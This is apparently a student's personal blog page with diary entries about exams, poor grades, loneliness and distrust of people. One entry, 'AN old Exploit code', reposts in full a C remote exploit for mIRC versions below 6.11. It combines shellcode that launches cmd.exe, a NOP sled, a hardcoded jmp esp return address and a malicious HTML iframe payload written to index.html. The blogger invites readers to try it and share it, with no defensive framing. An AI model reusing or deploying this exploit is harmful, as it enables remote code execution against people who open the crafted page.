Jyotirmoy's profileWalk AlonePhotosBlogLists Tools Help

Jyotirmoy Banik

Occupation
Interests
Lazy person. A little hope about me. Sleep is good for health.
May 26

Are we Headind towards a disaster ?

Tough times for us.
 
Both way confrontation.  In National life its clear that something is gonna happen. In my edu careear , I also think some gonna happen.
 
Our VC is just heading towards a disaster....
 
Only time can say what will happen...
 
But I must pray for the least because I dont want any hall vacant.
April 14

Imagination

Imagination is the thing that Keeps me alive.
 
I have millions of limitations. I can't do many things. I can't sing , I can't dance, I can't debate, I can't play guitars, I can't play even any instruments, I am not expert in Networking and Programmming, I am a bad student in my university, I am not an essential person to anyone. Most Prob'ly it's all the same  whether I belong to this world or not. Without my parents , brothers ans sisters and some close relatives, it will be little matter to other people whether I am dead or Alive.
 
Then what is the inspiration that Keeps me Alive ??
 
That is Love and more specifically Imagination. Imagination gives me the inspiration, to live, to survive and sustain......This imagination keeps me different from many other men.
 
Most prob'ly Imagination power and dream are the things that help loosers like me to survive in this world. 
March 17

Mid-term

At last I have got a bit of relief. There was lotta pressure during this term. But after having a hellish 7 weeks packed of shitty sessionals and stupid reports n specially with fuckn CTS.....I am quite ok n passin some good time.
 
n ofcourse preparin myself for next upcoming bad days. :(
March 02

AN old Exploit code

#include <stdio.h>

/* Stupid cmd.exe exec shellcode. hey! I r !evil */
unsigned char shellcode[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x8b\xec\x55\x8b\xec\x68\x65\x78\x65\x20\x68\x63\ x6d\x64\x2e\x8d\x45\xf8\x50\xb8"
"\x44\x80\xbf\x77" // 0x78bf8044 <- adress of system()
"\xff\xd0"; // call system()

char jmpback[] =
"\xE9\xCF\xFB\xFF\xFF"; // my leet negative JMP shellcode
char buffer[1100], fstring[1300]; // heh, need to clean this up
int main(int argc, char *argv[]) {
FILE *evil;
fprintf(stdout, "---------------------------------------------\n"
"mIRC < 6.11 remote exploit by
blasty@geekz.nl\n"
"---------------------------------------------\n\n");
// NOPslides are cool
memset(buffer, 0x90, sizeof(buffer) - 1);
// place shellcode in buffer
memcpy(buffer + 20, shellcode, strlen(shellcode));
// took this one from ntdll.dll (jmp esp)
*(long *)&buffer[994] = 0x77F4801C;
// place jmpback shellcode in buffer
memcpy(buffer + 20 + strlen(shellcode) + 1010, jmpback, strlen(jmpback));
printf("[+] Evil buffer constructed\n");

// open HTML file for writing
if((evil = fopen("index.html", "a+")) != NULL) {
// construct evil string
sprintf(fstring, "<iframe src=\"irc://%s\"></iframe>", buffer);
// write string to file
fputs(fstring, evil);
// close file
fclose(evil);
printf("[+] Evil HTML file written!\n");
return(0);
} else {
// uh oh.. :/
fprintf(stderr, "ERROR: Could not open index.html for writing!\n");
exit(1);
}
}
 
I am just pasting old exploit regarding mIRC. IF this work, then atleast as a normal manner send it to me i mean share it with me. Lets enjoy the code.
February 07

Tough Side of Life is Just turning around...

I have passed almost an flawless Life. Haven't show too much complicacy. Life was almost like that what I wanted.
 
But things have changed. The tough side of life is just turning around.
 
one after one incident makes me feeling looser. Most probly, man has nonthing to do when he has no hope.
January 21

Confession [ and another fake resolution ? ]

I am writing this blog just 7 hrs before my result. Result of 2-1 exam. Undoubtedly this is a term which is easymost for us . But I have totally wasted it. At the very starting of the term I was busy in some sort of noble work. I have no complain about that [ works regarding fund raising for Ridoy]. Then I have got involved in BFS. This is another good org. For this Org I also have lost a week. But its also a lame excuse. Throughout the term , in this way I have lost valuable times.

 

But at PL when everybody even chair table of Buet also read attentively, I paid no attention. gave my full attention to new hacking techs and exploit world.

 

Now I am really feeling very much worried. Probly I didnt feel so much bad even before my ssc/hsc result.

 

I have decided to read seriously next term. These type of resolutions are taken in almost every terms.

 

But this time I m serious. Indeed.

December 27

3 Observations of My Life

Well without giving you a single clue why I am writing this , I am just wanna inform you that I have found 3 most important facts in Human Life.
 
First of all, Do not trust AnyBody. Yes, It's sounds familiar as it was the stone cold steve Austin icon but believe me it's a hardcore truth.
 
Secondly, EveryOne in this world is completely fake. Do you think you know the man beside you well ? huh, if u think so u r 100 miles away from the reality mite. Just open your eyes and realize how everyone around as keep going on this acting....seems to me all those actor should get immediately an Oscar.
 
Finally, The most foolish thing is to think/treat someone is/as a fool. If you think I am really a fool person and you are clever enough to cheat me, then you are completely wrong. I am the One who Knows Every thing but still keep myself silent because I am not a beast , I am Human and I have to think why? Why ? these things are happening in this world....
 
Seems to me these theorems gonna make me out of Home...In search of eternal peace where no one cheates other and I can live a healthy life.
 
There are no photo albums.
No list items have been added yet.